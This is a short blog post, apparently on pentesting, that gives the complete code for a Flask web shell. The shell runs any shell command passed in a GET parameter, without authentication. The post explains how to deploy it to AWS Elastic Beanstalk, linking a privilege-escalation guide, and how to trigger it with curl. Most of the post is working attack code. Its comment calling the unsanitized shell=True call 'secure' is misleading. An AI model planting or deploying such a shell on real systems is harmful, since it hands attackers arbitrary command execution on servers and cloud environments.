A Simple Web Shell in Flask

0 Comments

  • Home
  • /
  • Blog
  • /
  • A Simple Web Shell in Flask
Share0
Tweet0
Share0
Share0
Tweet0
Share0

This contains a simple Web Shell in Flask. This can be used in Flask Application penetration testing to execute system commands. 

Execute Web Shell

Create a file named requirements.txt with the following content.

Flask

Create a file named application.py with the following code in it.

from flask import Flask, request, jsonify
import subprocess

app = Flask(__name__)

@app.route('/exec', methods=['GET'])
def exec_command():
    # Get the shell command from the query parameters
    command = request.args.get('command')
    
    if not command:
        return jsonify({"error": "No command provided"}), 400
    
    # Ideally, validate and sanitize the command here!
    
    try:
        # Running the command securely with subprocess
        result = subprocess.run(command, shell=True, capture_output=True, text=True)
        return jsonify({
            "stdout": result.stdout,
            "stderr": result.stderr,
            "returncode": result.returncode
        })
    except Exception as e:
        return jsonify({"error": str(e)}), 500

if __name__ == '__main__':
    # Use the following if you're upload to Elastic BeanStalk or other such container
    app.run(debug=True)
    # Use the following for local Testing
    # app.run(host='0.0.0.0', port=5000)

Execute From Elastic Beanstalk

Upload and Publish the Web Shell Flask app, as your requirments needed. Find help from the following links.

More Info:

https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkrebuildenvironment-s3-write-permissions–many-others

https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/python-quickstart.html

Execute command by Sending the Following GET Request

curl "http://<your-elastic-beanstalk-URL>/exec?command=ls%20-l"

Execute From Local Setup for Testing

Make changes to the Last Line as below to run on local server port 5000

# Use the following if you're upload to Elastic BeanStalk or other such container
    # app.run(debug=True)
    # Use the following for local Testing
     app.run(host='0.0.0.0', port=5000)

Then run the following command from the same folder where the application.py and requirments.txt file exist to start the Flask server with the web shell.

# export FLASK_APP=application.py && flask run --port 5000
 * Serving Flask app 'application.py'
 * Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
 * Running on http://127.0.0.1:5000
Press CTRL+C to quit

 Previous
Next

Tags

AWS, Cloud Security, Flask, Web Application Security, Web Shell

You may also like

  • Home
  • /
  • Blog
  • /
  • A Simple Web Shell in Flask